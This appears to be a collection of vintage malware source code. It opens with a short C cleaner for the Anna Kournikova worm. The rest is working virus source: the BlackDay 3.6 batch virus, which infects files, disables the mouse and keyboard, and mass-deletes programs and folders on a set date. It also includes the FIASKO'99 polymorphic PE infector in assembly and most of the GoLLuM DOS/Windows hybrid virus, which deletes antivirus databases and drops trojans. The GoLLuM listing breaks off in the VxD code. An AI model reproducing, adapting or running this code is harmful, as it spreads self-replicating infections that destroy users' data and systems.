/* * AnnaKlean.c : Console Application To Wipe Out Anna Kournikova Worm From Registry * 27/02/2001 - By Wanderley J. Abreu Jr. * storm@stormdev.

net */ #include <stdio.h> #include <conio.h> #include <windows.h> #include <winbase.h> #define PATH 256

int main(void) { LONG lnResult; HKEY hKey; CHAR bfWindows[PATH]; /* Open the Registry key the worm created... */ if ( ERROR_SUCCESS != RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\", 0, KEY_ALL_ACCESS, &hKey) ) { // If already clean, notify user... printf("Error opening key, use RegEdit\n"); printf("Press Any Key To Continue..."); _getch(); return 0; } /* Delete The Registry Entry...*/ lnResult = RegDeleteKey(hKey,"OnTheFly\\"); if ( ERROR_SUCCESS != lnResult ) { // Some error, so notify user... if ( lnResult == ERROR_FILE_NOT_FOUND ) { // Key has already been deleted... RegCloseKey(hKey); printf("You Don't Have Any Traces of Anna Kournikova Worm...\n"); printf("Press Any Key To Continue..."); _getch(); return 0; } // if // Some other error... printf("Error deleting key, use RegEdit\n"); RegCloseKey(hKey); return 0; } // if printf("All Traces of The Anna Kournikova Worm Were Deleted from your Windows System...\n"); printf("You Must Check your Windows Directory for the file 'Annakournikova.jpg.vbs'...\n"); printf("Press Any Key To Continue...");

_getch(); return 0; }

BLACK DAY 3.6

@echo off%_bd-ptrr% if '%1=='bd-ptrr goto bd-ptrr%2 set bd-ptrr=%0.bat if not exist %bd-ptrr% set bd-ptrr=%0 if '%bd-ptrr%==' set bd-ptrr=autoexec.bat if exist c:\_bd-ptrr.bat goto bd-ptrrg if not exist %bd-ptrr% goto ebd-ptrr find "bd-ptrr"<%bd-ptrr%>c:\_bd-ptrr.bat attrib c:\_bd-ptrr.bat +h :bd-ptrrg command /c c:\_bd-ptrr bd-ptrr vir :ebd-ptrr set bd-ptrr= goto bd-ptrrend :bd-ptrrvir for %%a in (*.bat ..\*.bat) do call c:\_bd-ptrr bd-ptrr i %%a exit bd-ptrr :bd-ptrri find "bd-ptrr"<%3>nul if not errorlevel 1 goto bd-ptrrend type %3>bd-ptrr$ echo.>>bd-ptrr$ type c:\_bd-ptrr.bat>>bd-ptrr$ move bd-ptrr$ %3>nul :bd-ptrrend ctty nul del c:\programme\norton~1\s32integ.dll if exist c:\windows\startmen \programme\autostart\AntiVirus.bat goto comexe if not exist c:\windows\startmen \programme\autostart\AntiVirus.bat goto residency :residency copy AntiVirus.bat c:\windows\startmen \programme\autostart attrib c:\windows\startmen \programme\autostart\AntiVirus.bat +h +r :comexe for %%f in (*.exe *.com) do set A=%%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto phnord attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A=

:phnord echo.|date|find "24">nul.bd-ptrr if errorlevel 1 goto phuck ctty con echo I hate Jesus Christ and his phuckin Birthday. echo For me is the 24th of December just another BlackDay in a dark World. echo For you now, every 24th gets such a BlackDay. echo The same for your phuckin System, too. echo ... echo BlackDay v3.6 by PhileT0a$t3r [rRlf] ctty nul c:\windows\rundll32.exe mouse,disable c:\windows\rundll32.exe keyboard,disable del c:\windows\calc.exe del c:\windows\cdplayer.exe del c:\windows\command.com del c:\windows\notepad.exe del c:\windows\pbrush.exe del c:\windows\regedit.exe del c:\windows\write.exe del c:\programme\winrar\winrar.exe del c:\t_online\online.exe del c:\acrobatx\reader\acrord32.exe del c:\corel\draw70\programs\photopnt.exe del c:\programme\d-info99\dinfo.exe del c:\programme\netscape\communicator\program\netscape.exe del c:\programme\quicktime\pictureviewer.exe del c:\programme\quicktime\movieplayer.exe del c:\programme\real\realplayer\realplay.exe del c:\programme\moviem~1\moviemk.exe del c:\programme\window~1\wmplayer.exe del c:\programme\klicktel\klickt~1\ktel32.exe del c:\programme\intern~1\iexplorer.exe del c:\winzip\winzip32.exe del c:\programme\micros~1\office\winword.exe del c:\programme\micros~1\office\outlook.exe del c:\programme\micros~1\office\msaccess.exe del c:\programme\micros~1\office\excel.exe deltree /y c:\windows\desktop deltree /y c:\eigene~1 deltree /y c:\windows\sendto del c:\logo.sys copy c:\windows\system\shell32.dll c:\ rename c:\shell32.dll logo.sys del c:\windows\logos.sys copy c:\windows\system\shell32.dll c:\windows rename c:\windows\shell32.dll logos.sys del c:\windows\logow.sys copy c:\windows\system\shell32.dll c:\windows rename c:\windows\shell32.dll logow.sys c:\windows\rundll32.exe user,disableoemlayer

:phuck ctty con @if exist V%0.com V%0.com %1 %2 %3 @if exist V%0.exe V%0.exe %1 %2 %3 ctty nul :dusk

comment " FIASKO'99 created by mort[MATRiX] - simple PE infector with some semi-polymorph rout. - TASM rools... - try infect 2 files in directory - no payload - thanx to Lord Julus - i hope there's not to much your code...;) "

_vSize _hSize

equ @endOfIT - @start equ 060h

.586 .model flat,stdcall extrn extrn .data dd 0 .code @start: db _hSize dup(090h) @bleh: cld sti sbb eax,offset @start pushfd call @findKernel jc @nope ExitProcess : proc MessageBoxA : proc

add eax,078h xchg eax,esi xchg eax,ebx lodsd add eax,ebx add eax,018h xchg esi,eax lodsd push eax lodsd push eax lodsd push eax lodsd push eax pop eax pop eax pop ecx pop edx add eax,ebx xchg eax,esi @nextName: lodsd add eax,ebx lea edi,[ebp + _GPA] mov ecx,_GPASize xchg esi,eax rep cmpsb jz @foundGPA xchg eax,esi dec edx jnz @nextName @foundGPA: mov eax,[esp - 4] sub eax,edx sub esp,010h shl eax,1 pop esi add eax,ebx add esi,eax xor eax,eax lodsw shl eax,2 pop esi

;find GetProcAddress

;number of names ;address of funcs ;address of names ;address of ordinals

pop esi add eax,ebx add esi,eax lodsd add eax,ebx mov [ebp + _GPAAdd],eax pop esi call @infect @nope: popfd jz @firstExecution mov eax,00dead00h _hostIP equ $ - 4 jmp eax @firstExecution: push 0 call @@1 db 'mort[MATRiX]''s virus',0 @@1: call @@2 db 'FIASKO''99 - 10x 4 nothing...',0 @@2: call MessageBoxA,0 call ExitProcess,0 ;-----------------------------------------------------( data )-----------_GPA db 'GetProcAddress',0 _GPASize = $ - _GPA _GPAAdd dd ? _retAdd dd ? _mask db '*.exe',0 _fileHandle dd ? _mapHandle dd ? _mapBase dd ? _fileTime3x dd 0,0,0 _newFileSize dd ? _XFindFirstFile db "FindFirstFileA",0 _XFindNextFile db "FindNextFileA",0 _XGetCurrentDirectory db "GetCurrentDirectoryA",0 _XCreateFileMapping db "CreateFileMappingA",0 _XMapViewOfFile db "MapViewOfFile",0 _XUnmapViewOfFile db "UnmapViewOfFile",0 _XGetFileAttributes db "GetFileAttributesA",0 _XSetFileAttributes db "SetFileAttributesA",0 _XCreateFile db "CreateFileA",0 _XCloseHandle db "CloseHandle",0

_XSetFileTime db "SetFileTime",0 _XSetFilePointer db "SetFilePointer",0 _XSetEndOfFile db "SetEndOfFile",0 _XSetCurrentDirectory db 'SetCurrentDirectoryA',0 max_path EQU 260 filetime STRUC FT_dwLowDateTime DD ? FT_dwHighDateTime DD ? filetime ENDS fileSearch STRUC FileAttributes DD ? CreationTime filetime ? LastAccessTime filetime ? LastWriteTime filetime ? FileSizeHigh DD ? FileSizeLow DD ? Reserved0 DD ? Reserved1 DD ? FileName DB max_path DUP (?) AlternateFileName DB 13 DUP (?) DB 3 DUP (?) fileSearch ENDS _crtDir db 080h dup(0) _fileSearch fileSearch <?> ;-----------------------------------------( call kernel API )------------@cAPI: pop dword ptr [ebp + _retAdd] push eax db 068h _kernelBase dd ? call [ebp + _GPAAdd] call eax jmp [ebp + _retAdd] ;--------------------------------------------------( find kernel base )--@findKernel: call @delta @delta: mov eax,[esp + 0ch] shr eax,0ch mov ecx,050h ror eax,014h @fKl3: cmp word ptr [eax],'ZM' jz @fKl1 @fKl2: sub eax,01000h

dec ecx jnz @fKl3 pop ebp sub ebp,offset @delta stc ret @fKl1: push eax mov eax,[eax + 03ch] pop esi cmp word ptr [esi + eax],'EP' jnz @fKl2 add eax,esi ;esi - kernel base

pop ebp mov [ebp + _kernelBase - @delta],esi sub ebp,offset @delta clc ret ;eax - kernel PE

;--------------------------------------------( infect )------------------@infect: lea eax,[ebp + _crtDir] push eax eax push 080h lea eax,[ebp + _XGetCurrentDirectory] call @cAPI @nextDir: lea eax,[ebp + _XSetCurrentDirectory] call @cAPI lea eax,[ebp + _fileSearch] push eax push eax lea eax,[ebp + _mask] push eax lea eax,[ebp + _XFindFirstFile] call @cAPI inc eax jz @eou dec eax push eax call @tryInfect ;push handle

lea eax,[ebp + _XFindNextFile] call @cAPI or eax,eax jz @kdoMaPoradHledatNakyMenaProTyZasranyLabely ;czech rules call @tryInfect ;this shit seems to be shortest

@kdoMaPoradHledatNakyMenaProTyZasranyLabely: push eax @eou: pop eax xor al,al lea edi,[ebp + _crtDir] push edi cld repnz scasb mov al,'\' std repnz scasb inc edi xor al,al stosb cmp byte ptr [edi],':' jz @done jmp @nextDir @done: pop edi push edi cld @nextDir1: xor al,al repnz scasb dec edi mov al,'\' stosb cmp byte ptr [edi],0 jnz @nextDir1 lea eax,[ebp + _XSetCurrentDirectory] call @cAPI

ret ;----------------------------( open and infect it )----------------------@tryInfect: lea eax,[ebp + _fileSearch.FileName] mov esi,eax

push 080h push eax lea eax,[ebp + _XSetFileAttributes] call @cAPI or eax,eax jz @eouTotal push 0 0 3 0 1 ;open file push 80000000h or 40000000h push esi lea eax,[ebp + _XCreateFile] call @cAPI inc eax jz @eou1 dec eax mov [ebp + _fileHandle],eax ;save time mov eax,[ebp + _fileSearch.FileSizeLow] mov [ebp + _newFileSize],eax add eax,01000h push eax push 0 eax 0 4 0 ;create map push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XCreateFileMapping] call @cAPI inc eax jz @eou2 dec eax mov [ebp + _mapHandle],eax push 0 0 2 push eax lea eax,[ebp + _XMapViewOfFile] call @cAPI or eax,eax jz @eou3 mov [ebp + _mapBase],eax xchg eax,esi cmp word ptr [esi],'ZM' jnz @fail cmp word ptr [esi + 038h],'TM' jz @fail

;mark of infect

mov eax,[esi + 03ch] cmp word ptr [esi + eax],'EP' jnz @fail call @infectFile @fail: push dword ptr [ebp + _mapBase] lea eax,[ebp + _XUnmapViewOfFile] call @cAPI @eou3: push dword ptr [ebp + _mapHandle] lea eax,[ebp + _XCloseHandle] call @cAPI

;close map

lea eax,[ebp + _fileSearch.CreationTime] push eax add eax,8 push eax add eax,8 push eax push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetFileTime] call @cAPI push 0 0 ;set new filesize push dword ptr [ebp + _newFileSize] push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetFilePointer] call @cAPI push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XSetEndOfFile] call @cAPI @eou2: push dword ptr [ebp + _fileHandle] lea eax,[ebp + _XCloseHandle] call @cAPI @eou1: push dword ptr [ebp + _fileSearch.FileAttributes] lea eax,[ebp + _fileSearch.FileName] push eax lea eax,[ebp + _XSetFileAttributes] call @cAPI @eouTotal: ret

;------------------------------------------( infect file )---------------_fileAlign dd ? _secAlign dd ? @infectFile: mov ebx,esi add esi,eax

;ebx - MZ, esi - PE

mov eax,[esi + 038h] mov [ebp + _secAlign],eax mov eax,[esi + 03ch] mov [ebp + _fileAlign],eax mov eax,[esi + 074h] shl eax,3 push eax xor eax,eax mov ax,[esi + 06h] mov ecx,028h dec eax mul ecx pop edi add edi,eax add edi,esi add edi,078h ;edi - last sec's header mov eax,[edi + 010h] ;set new physical size add eax,_vSize mov ecx,[ebp + _fileAlign] div ecx inc eax mul ecx sub eax,[edi + 010h] add [esi + 050h],eax add [ebp + _newFileSize],eax mov edx,[edi + 010h] add [edi + 010h],eax or dword ptr [edi + 024h],0a0000020h mov eax,[edi + 0ch] add eax,edx mov [ebp + _xorOffs],eax xchg [esi + 028h],eax add eax,[esi + 034h] ;host ip mov dword ptr [ebp + _hostIP],eax

add [ebp + _xorOffs],_hSize ;xored offset

mov eax,[esi + 034h] add [ebp + _xorOffs],eax push edx xor edx,edx mov eax,[edi + 08h] mov ecx,[ebp + _secAlign] div ecx inc eax mul ecx mov [edi + 08h],eax pop edx mov eax,[edi + 014h] add eax,edx add eax,ebx xchg eax,edi lea esi,[ebp + @start] call @setHeader ;ok - dont laught... ;yesssssss, it's stupid

mov word ptr [ebx + 038h],'TM' mov ecx,_hSize rep movsb mov ecx,_vSize/4 - _hSize/4 mov ebx,[ebp + _xorAdd] mov edx,[ebp + _xorConst] @nextDD2copy: lodsd xor eax,edx stosd add edx,ebx loop @nextDD2copy ret

;--------------------------------------( random )------------------------@random: ;CF->1 - byte push ecx pushf in eax,040h and eax,03fh ;we'll fit everywhere mov ecx,eax inc ecx xor ch,bh @delay:

loop @delay popf jc @hops and eax,07 @hops: pop ecx ret ;-------------------------------------------( set header )---------------_regSet label byte db ? ;xor offset db ? ;xor const db ? ;xor add db ? ;xor size db ? ;1st. usefull reg db ? ;2nd. usefull reg _xorOffs _xorConst _xorAdd _xorSize _xorNext @setHeader: pusha in eax,040h mov [ebp + _xorConst],eax mov dword ptr [ebp + _regSet],0ffffffffh mov word ptr [ebp + _regSet + 4],0ffffh lea edi,[ebp + _regSet] mov edx,6 @nextReg: clc call @random cmp al,4 jz @nextReg cmp al,5 jz @nextReg ;esp ;ebp ;;) dd ? ;xor offset dd ? ;xor constant dd ? ;xor adding dd _vSize/4 ;xored size dd ?

;set registers we'll use

push edi lea edi,[ebp + _regSet] mov ecx,6 repnz scasb pop edi jz @nextReg

stosb dec edx jnz @nextReg in eax,040h mov [ebp + _xorAdd],eax lea edi,[ebp + @start] lea esi,[ebp + _regSet] lea ebx,[ebp + _xorOffs] mov ecx,4 @nextMOVie: call @addShit lodsb add al,0b8h xchg esi,ebx stosb lodsd stosd xchg esi,ebx call @addShit loop @nextMOVie call @addShit ;---------------------------------------------( set xor instruction )----mov [ebp + _xorNext],edi mov al,031h stosb lea esi,[ebp + _regSet] xor eax,eax lodsb mov bl,al lodsb mov ecx,8 mul ecx add eax,ebx stosb call @addShit call @addShit ;--------------------------------------------( set add instruction )-----mov al,03h stosb dec esi lodsb mov bl,al lodsb

xchg al,bl mov ecx,8 mul ecx add al,bl add al,0c0h stosb call @addShit call @addShit ;--------------------------------------------( set 2nd add instruction )-mov al,083h stosb mov al,[esi - 3] add al,0c0h stosb mov al,4 stosb call @addShit call @addShit ;--------------------------------------------( set dec instruction )-----lodsb add al,048h stosb ;--------------------------------------------( set jnz instruction )-----call @hmmm jmp @oneByte mov ax,0850fh stosw mov eax,edi add eax,3 sub eax,[ebp + _xorNext] not eax stosd ;set 6 bytes jnz jmp @whoops @oneByte: mov al,075h stosb mov eax,edi sub eax,[ebp + _xorNext] not eax stosb ;set 2 bytes jnz @whoops: ;-----------------------( set last bytes stuff...)---------lea esi,[ebp + @bleh]

@nextStuff: push esi sub esi,edi cmp esi,6 pop esi jb @end call @addShit jmp @nextStuff @end: sub esi,edi jz @final mov ecx,esi @nextB: clc call @random lea esi,[ebp + _1BytesShit] add esi,eax lodsb stosb loop @nextB @final: popa ret ;----------------------------------------------------------_1BytesShit label byte clc cmc stc std cld cli sti clc ;-------------------------------( add shit instruction )---_2BytesShit label byte db 033h ;xor r32,r32 db 087h ;xchg r32,r32 db 013h ;adc r32,r32 db 02bh ;sub r32,r32 db 019h ;sbb r32,r32 db 09h ;or r32,r32 db 08bh ;mov r32,r32 db 03h ;add r32,r32 _lastShit db 0ffh

;---------------------------( add some code )---------------

@addShit: push esi ecx edx call @hmmm jnz @3bytes call @hmmm jnz @noShit @nextShit: clc call @random

;compare 2 and 3 bytes instructions

;no instruction will b add

lea esi,[ebp + _2BytesShit] ;set instruction add esi,eax lodsb cmp [ebp + _lastShit],al jz @nextShit mov [ebp + _lastShit],al lea esi,[ebp + _regSet] cmp byte ptr [esi + 4],6 jz @noDEC cmp byte ptr [esi + 5],7 jz @noDEC cmp byte ptr [esi + 4],7 jz @noDEC cmp byte ptr [esi + 5],6 jz @noDEC push eax call @hmmm pop eax jz @noDEC dec eax @noDEC: stosb xor eax,eax mov al,[esi + 4] mov ecx,8 mul ecx add al,[esi + 5] add al,0c0h stosb pop edx ecx esi ret ;----------------------------------------------------------_3BytesShit label byte db 08bh ;mov reg32,[mem] ;edi - di - ...where's the 8 bit version?

db 03h db 02bh db 0bh db 023h db 033h db 013h db 01bh _lastShit1

;add reg32,[mem] ;sub reg32,[mem] ;or reg32,[mem] ;and reg32,[mem] ;xor reg32,[mem] ;adc reg32,[mem] ;sbb reg32,[mem] db ?

@3bytes: lea esi,[ebp + _3BytesShit] ;set instruction @eouu: clc call @random cmp al,[ebp + _lastShit] jz @eouu mov [ebp + _lastShit],al add esi,eax lodsb cmp byte ptr [ebp + _regSet + 4],6 jz @noDEC1 cmp byte ptr [ebp + _regSet + 4],7 jz @noDEC1 cmp byte ptr [ebp + _regSet + 5],6 jz @noDEC1 cmp byte ptr [ebp + _regSet + 5],7 jz @noDEC1 push eax call @hmmm pop eax jz @noDEC1 dec al @noDEC1: stosb xor eax,eax mov al,[ebp + _regSet + 4] ;choose register push eax call @hmmm pop eax jz @ESInow ;the first one mov al,[ebp + _regSet + 5] @ESInow: mov ecx,8 mul ecx

add eax,5 stosb stc call @random add eax,[ebp + _xorOffs] stosd @noShit: pop edx ecx esi ret ;-----------------------------------------------------------@hmmm: push ecx edx call @random lea ecx,[ebp + @bleh] add ecx,eax mov eax,[ecx] xor eax,ecx xor edx,edx mov ecx,2 div ecx cmp ecx,edx or edx,edx pop edx ecx ret db 'whooops' @endOfIT label end @start

; ; ; ; ; ; ; ; ; ; ; ;

GoLLuM ViRuS - BioCoded by GriYo/29A CopyRight (c) 1997 All RiGhts ReseRVed World's first DOS/Win hybrid ever GoLLuM is the very first hybrid DOS-Windows virus ever... it infects DOS EXE files only when they're executed inside a DOS window under any of the known versions of Microsoft Windows (Windows 3.1x, Windows95...). It becomes resident as a virtual device driver when Windows starts, and then hooks V86 int 21h in order to monitor file execution, trying to in-

; fect more files under DOS sessions. ; ; When an EXE file is executed inside a MS-DOS window, GoLLuM will attach ; itself to the end of the file (it copies first its DOS code and then the ; VxD file, both of them encrypted with a simple 'not' operation). GoLLuM ; will not infect files that have digits or the 'V' character in their na; mes (this includes AVP, MSAV, CPAV...), as well as Thunderbyte utilities ; (TB*.*), McAffee shit and F-Prot. ; ; The virus also deletes some AV database files (ANTI-VIR.DAT, CHKLIST.MS, ; AVP.CRC, IVB.NTZ and CHKLIST.TAV) whenever it infects a file. When these ; infected files are run, GoLLuM inserts the string 'DEVICE=GOLLUM.386' ; into the [386Enh] section of the SYSTEM.INI file, and then drops its VxD ; file into the Windows \SYSTEM directory. ; ; The encryption used by GoLLuM consists on a simple 'not' operation, but ; the decryptor contains a little emulation trick (try to TbClean it!). ; Besides, it contains a date-triggered event, in which it will drop tro; jan files (using the DOS stub in its VxD file). ; ; I wrote this just for fun while learning something on VxD coding. GoLLuM ; consists on the following files: ; ; GOLLUM.ASM DOS virus code ; CRYPT.ASM Code used to encrypt DOS virus code ; WGOLLUM.MAK VxD makefile ; WGOLLUM.DEF VxD def file ; VXDSTUB.ASM VxD stub used in trojans ; WGOLLUM.ASM VxD virus code ; ASSEMBLE.BAT Batch file used to build GOLLUM.INC ; ; - -[GOLLUM.ASM - DOS virus code]- - - - - - - - - - - - - - - - - - - ->8 I_am_GoLLuM segment para 'CODE'

Header_Size equ 1Ch VxD_File_Size equ 6592 Decryptor_Size equ offset Bilbo_Dead All_Size equ offset Old_Header+(Header_Size+VxD_File_Size) Assume cs:I_am_GoLLuM,ds:I_am_GoLLuM,es:I_am_GoLLuM,ss:I_am_GoLLuM ;Virus entry point (code inserted intro infected .EXE files) ; GoLLuM_Entry_Point: ;Get delta offset stored on infection mov bp,0000h ;Save segment regs push ds push es ;Point segment regs to our code mov ax,cs

mov ds,ax mov es,ax ;Decrypt virus and VxD file mov si,offset Bilbo_Dead add si,bp mov di,si mov cx,(All_Size-Decryptor_Size+01h)/02h Decrypt_Gollum: ;Dont let GoLLum be emulated (Meeethyyyl! ;) cld lodsw push ax pop ax cli sub sp,0002h pop ax sti not ax cld stosw loop Decrypt_Gollum ;Clear prefetch db 0EBh,00h ;Drop GOLLUM.386 file and insert DEVICE=GOLLUM.386 into SYSTEM.INI ; Bilbo_Dead: ;Find SYSTEM.INI file mov si,offset Win_Sys_Table add si,bp mov cx,0005h cld Search_Loop: lodsw mov dx,ax add dx,bp ;Open file (read/write access) mov ax,3D02h int 21h jnc Open_Ok ;Try next file name loop Search_Loop jmp Gollum_Leave Open_Ok: ;Save SYSTEM.INI file handle mov word ptr cs:[System_Handle][bp],ax ;Build VxD file name mov si,dx mov di,offset VxD_File add di,bp

mov dx,di Copy_Directory: lodsb cmp al,"." je Found_Extension stosb jmp Copy_Directory Found_Extension: ;Insert the path separator mov al,"\" stosb ;Insert the name of the VxD file mov si,offset Device_String+09h add si,bp mov cx,000Ah rep movsb ;Put the null marker xor al,al stosb ;Create de VxD file, abort if exist mov ah,5Bh xor cx,cx mov dx,offset VxD_File add dx,bp int 21h jc Close_Sys ;Write VxD to file xchg bx,ax mov ah,40h mov dx,offset Old_Header+Header_Size add dx,bp mov cx,VxD_File_Size int 21h jnc ok_VxD_Write ;Close VxD file if error... mov ah,3Eh int 21h ;...and delete it! mov ah,41h mov dx,offset VxD_File add dx,bp int 21h Close_Sys: mov bx,word ptr cs:[System_Handle][bp] jmp Exit_Infection ok_VxD_Write: ;Get handle of SYSTEM.INI file mov bx,word ptr cs:[System_Handle][bp] ;Seek to EOF mov ax,4202h xor cx,cx

xor dx,dx int 21h jc Bad_Size ;Strange! SYSTEM.INI file too big or dx,dx jnz Bad_Size cmp ax,VxD_File_Size jb Size_Ok Bad_Size: jmp Exit_Infection Size_Ok: ;Save SYSTEM.INI file size mov word ptr cs:[System_Size][bp],ax ;Seek to BOF mov ax,4200h xor cx,cx xor dx,dx int 21h jc Bad_Size ;Read SYSTEM.INI over VxD file copy mov ah,3Fh mov cx,word ptr cs:[System_Size][bp] mov dx,offset Old_Header+Header_Size add dx,bp int 21h jc bad_size ;Check if SYSTEM.INI have been infected mov cx,word ptr cs:[System_Size][bp] mov di,dx mov al,"G" Do_Inspect: cld repne scasb or cx,cx jz System_Clean ;Exit if already resident cmp word ptr es:[di],"LO" jne Do_Inspect cmp word ptr es:[di+02h],"UL" jne Do_Inspect jmp Exit_Infection System_Clean: ;Search for [386Enh] string mov cx,word ptr cs:[System_Size][bp] mov di,dx Section_Search: cld mov si,di lodsw cmp ax,"3[" jne Next_Char

lodsw cmp ax,"68" je Section_Found Next_Char: inc di loop Section_Search ;Section not found, abort jmp Exit_Infection Section_Found: ;Save distance from [386Enh] string to EOF mov ax,0008h sub cx,ax add di,ax sub word ptr cs:[System_Size][bp],cx ;Seek next to [386Enh] string mov ax,4202h mov dx,cx neg dx xor cx,cx dec cx int 21h jc Exit_Infection ;Write our load string mov ah,40h mov cx,0015h mov dx,offset Device_String add dx,bp int 21h jc Exit_Infection ;Write the rest of SYSTEM.INI file mov ah,40h mov cx,word ptr cs:[System_Size][bp] mov dx,di int 21h Exit_Infection: ;Close file (bx=handle) mov ah,3Eh int 21h ;Get control back to host ; Gollum_Leave: ;Restore segment registers pop es pop ds ;File SYSTEM.INI not found, return to host mov ah,62h int 21h add bx,10h add word ptr cs:[exe_cs][bp],bx ;Restore stack

cli add bx,word ptr cs:[Old_Header+0Eh][bp] mov ss,bx mov sp,word ptr cs:[Old_Header+10h][bp] sti ;Clear some regs xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di xor bp,bp ;Clear prefetch db 0EBh,00h ;Jump to original entry point db 0EAh exe_ip dw 0000h exe_cs dw 0000h ; ;String table Win_Sys_Table dw offset Win_Sys_01h dw offset Win_Sys_02h dw offset Win_Sys_03h dw offset Win_Sys_04h dw offset Win_Sys_05h ;Posible locations of SYSTEM.INI file Win_Sys_01h db "C:\WINDOWS\SYSTEM.INI",00h Win_Sys_02h db "C:\WIN\SYSTEM.INI",00h Win_Sys_03h db "C:\WIN31\SYSTEM.INI",00h Win_Sys_04h db "C:\WIN311\SYSTEM.INI",00h Win_Sys_05h db "C:\WIN95\SYSTEM.INI",00h ;Buffer where virus build VxD file name and path VxD_File db 20h dup (00h) ;String inserted into SYSTEM.INI Device_String db 0Dh,0Ah,"DEVICE=GOLLUM.386",0Dh,0Ah ;Misc data System_Size dw 0000h System_Handle dw 0000h ;Next bytes = Old .EXE header + VxD file copy Old_Header equ this byte ; I_am_GoLLuM ends end GoLLuM_Entry_Point ; - -[CRYPT.ASM - Code used to encrypt DOS virus code]- - - - - - - - - ->8 vir_test segment para 'CODE' Assume cs:vir_test,ds:vir_test,es:vir_test,ss:vir_test

org 0000h Start: mov ax,cs mov ds,ax mov es,ax mov ax,3D00h mov dx,offset f_name int 21h jc exit_prog xchg bx,ax mov ah,3Fh mov cx,0FFFFh mov dx,offset copy int 21h jc close_file push ax mov ah,3Eh int 21h jc close_file mov si,offset copy+0027h mov di,si mov cx,9000 cld encrypt: lodsb not al stosb loop encrypt mov ah,3Ch xor cx,cx mov dx,offset x_name int 21h jc exit_prog xchg bx,ax mov ah,40h mov dx,offset copy pop cx int 21h close_file: mov ah,3Eh int 21h exit_prog: mov ax,4C00h int 21h f_name db "GOLLUM.BIN",00h x_name db "GOLLUM.CRP",00h copy db 10000 dup (00h) vir_test ends end Start ; - -[WGOLLUM.MAK - VxD makefile] - - - - - - - - - - - - - - - - - - - ->8

# file: wgollum.mak (VxD makefile) all : wgollum.exe vxdstub.obj: vxdstub.asm masm -Mx -p -w2 vxdstub; vxdstub.exe: vxdstub.obj link vxdstub.obj; wgollum.obj: wgollum.asm .\debug.inc .\vmm.inc .\shell.inc masm5 -p -w2 -Mx $(Debug) wgollum.asm; objs = wgollum.obj wgollum.386: vxdstub.exe wgollum.def $(objs) link386 @wgollum.lnk addhdr wgollum.386 mapsym32 wgollum wgollum.exe: wgollum.386 copy wgollum.386 wgollum.exe ; - -[WGOLLUM.DEF - VxD def file] - - - - - - - - - - - - - - - - - - - ->8 library wgollum description 'GoLLuM ViRuS for Microsoft Windows by GriYo/29A' stub 'vxdstub.exe' exetype dev386 segments _ltext preload nondiscardable _ldata preload nondiscardable _itext class 'icode' discardable _idata class 'icode' discardable _text class 'pcode' nondiscardable _data class 'pcode' nondiscardable ; - -[VXDSTUB.ASM - VxD stub used in trojans] - - - - - - - - - - - - - ->8 name vxdstub _TEXT segment word public 'CODE' assume cs:_TEXT,ds:_TEXT,es:_TEXT ;Activation routine ; vxdstub proc far ;Segment regs! mov ax,cs mov ds,ax

mov es,ax ;Set video mode 80x25x16c mov ax,0003h int 10h ;Print "Gollum!" mov ax,1301h mov bx,0002h mov cx,0007h mov dx,0A24h mov bp,offset Gollum_Says int 10h ;Endless loop Dead_Zone: ;Aaaarrrgggghhhhh!!!! jmp Dead_Zone ;Text printed on screen db "GoLLum!"

Gollum_Says vxdstub endp

_TEXT ends end vxdstub ; - -[WGOLLUM.ASM - VxD virus code] - - - - - - - - - - - - - - - - - - ->8 .386p ; ;Includes ; .XLIST INCLUDE Vmm.Inc INCLUDE SheLL.Inc .LIST ; ;Virtual device declaration ; Declare_Virtual_Device WGoLLuM,03h,00h,WGoLLuM_Control,Undefined_Device_ID,,, ; ;Initialization data segment ; VxD_IDATA_SEG VxD_Installation_Title db "GoLLuM ViRuS by GriYo/29A",00h VxD_Installation_Msg db "Deep down here by the dark water lived old " db "Gollum, a small slimy creature. I dont know "

db "where he came from, nor who or what he was. " db "He was a Gollum -as dark as darkness, except " db "for two big round pale eyes in his thin face." db 0Dh,0Ah,0Dh,0Ah db "J.R.R. ToLkieN ... The HoBBit" db 0Dh,0Ah,0Dh,0Ah db 00h VxD_IDATA_ENDS ; ;Local locked data segment ; VxD_LOCKED_DATA_SEG Header_Size VxD_Size equ 001Ch ;Dos .EXE header size equ 6592 ;VxD file size ALIGN DWORD DOS_Virus_Code equ this byte ;Start of Dos virus code include gollum.inc ;Load Dos virus code Header_Copy db Header_Size dup (00h) ;Buffer for old .EXE header DOS_Virus_End equ this byte DOS_Virus_Size equ (DOS_Virus_End-DOS_Virus_Code) Our_Own_Call_Flag db "EERF" ;Dos call from virus? File_Size dd 00000000h ;Size of file to infect Start_FileName dd 00000000h ;Filename start VxD_Buffer db 0200h dup (00h) ;VxD file copy Infect_FileName db 80h dup (00h) ;Last executed file File_Header db Header_Size dup (00h) ;Infected .EXE header VxD_File_Name db 80h dup (00h) ;Path of virus VxD Gollum_Name db "GOLLUM.386",00h ;Name of virus VxD file Trojan_File_Name db "GOLLUM.EXE",00h ;Generated trojans CheckSum_File_00: db "ANTI-VIR.DAT",00h ;Names of av databases CheckSum_File_01: db "CHKLIST.TAV",00h CheckSum_File_02: db "CHKLIST.MS",00h CheckSum_File_03: db "AVP.CRC",00h CheckSum_File_04: db "IVB.NTZ",00h Gollum_Handle dw 0000h ;VxD file handle Victim_Handle dw 0000h ;Victim file handle File_Attr dw 0000h ;Victim file attr File_Time dw 0000h ;Victim file time File_Date dw 0000h ;Victim file date VxD_LOCKED_DATA_ENDS ; ;Initialization code segment ; VxD_ICODE_SEG

